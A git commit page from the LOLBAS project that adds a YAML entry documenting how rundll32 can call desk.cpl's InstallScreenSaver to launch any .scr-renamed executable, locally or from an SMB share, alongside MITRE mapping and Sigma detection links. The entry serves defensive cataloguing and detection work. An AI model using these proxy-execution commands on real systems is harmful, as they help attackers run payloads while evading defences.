mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2025-07-25 19:53:08 +02:00
Merge branch 'master' into windows_11_sprint
This commit is contained in:
44
yml/OSLibraries/Desk.yml
Normal file
44
yml/OSLibraries/Desk.yml
Normal file
@@ -0,0 +1,44 @@
|
||||
---
|
||||
Name: Desk.cpl
|
||||
Description: Desktop Settings Control Panel
|
||||
Author: Hai Vaknin
|
||||
Created: 2022-04-21
|
||||
Commands:
|
||||
- Command: rundll32.exe desk.cpl,InstallScreenSaver C:\temp\file.scr
|
||||
Description: Launch an executable with a .scr extension by calling the InstallScreenSaver function.
|
||||
Usecase: Launch any executable payload, as long as it uses the .scr extension.
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
- Command: rundll32.exe desk.cpl,InstallScreenSaver \\127.0.0.1\c$\temp\file.scr
|
||||
Description: Launch a remote executable with a .scr extension, located on an SMB share, by calling the InstallScreenSaver function.
|
||||
Usecase: Launch any executable payload, as long as it uses the .scr extension.
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\desk.cpl
|
||||
- Path: C:\Windows\SysWOW64\desk.cpl
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/file_event/file_event_win_new_src_file.yml
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_rundll32_installscreensaver.yml
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_set/registry_set_scr_file_executed_by_rundll32.yml
|
||||
Resources:
|
||||
- Link: https://vxug.fakedoma.in/zines/29a/29a7/Articles/29A-7.030.txt
|
||||
- Link: https://twitter.com/pabraeken/status/998627081360695297
|
||||
- Link: https://twitter.com/VakninHai/status/1517027824984547329
|
||||
- Link: https://jstnk9.github.io/jstnk9/research/InstallScreenSaver-SCR-files
|
||||
Acknowledgement:
|
||||
- Person: Rafael S Marques
|
||||
Handle: '@pegabizu'
|
||||
- Person: Pierre-Alexandre Braeken
|
||||
Handle: '@pabraeken'
|
||||
- Person: hai
|
||||
Handle: '@VakninHai'
|
||||
- Person: Christopher Peacock
|
||||
Handle: '@SecurePeacock'
|
||||
- Person: Jose Luis Sanchez
|
||||
Handle: '@Joseliyo_Jstnk'
|
||||
---
|
@@ -1,5 +1,5 @@
|
||||
---
|
||||
Name: Ieaframe.dll
|
||||
Name: Ieframe.dll
|
||||
Description: Internet Browser DLL for translating HTML code.
|
||||
Author:
|
||||
Created: 2018-05-25
|
||||
|
Reference in New Issue
Block a user